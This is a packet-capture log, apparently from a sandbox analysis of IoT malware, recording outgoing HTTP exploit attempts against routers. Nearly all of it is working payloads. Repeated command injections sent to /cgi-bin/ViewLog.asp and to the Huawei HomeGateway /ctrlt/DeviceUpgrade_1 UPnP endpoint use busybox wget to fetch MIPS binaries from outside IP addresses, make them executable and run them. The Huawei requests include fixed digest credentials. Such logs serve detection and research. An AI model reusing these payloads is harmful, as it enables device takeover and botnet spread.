                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:25.507096052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.811022043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:32.418766022 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:41.634404898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.065629959 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              412192.168.2.143332685.112.171.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:23.767092943 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.954444885 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:17:23 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              413192.168.2.1442532156.254.71.3437215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:24.534404993 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:26.147047043 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:28.067013025 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:31.906790018 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:39.586525917 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:54.945863008 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              414192.168.2.145482841.232.230.17637215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:24.789058924 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
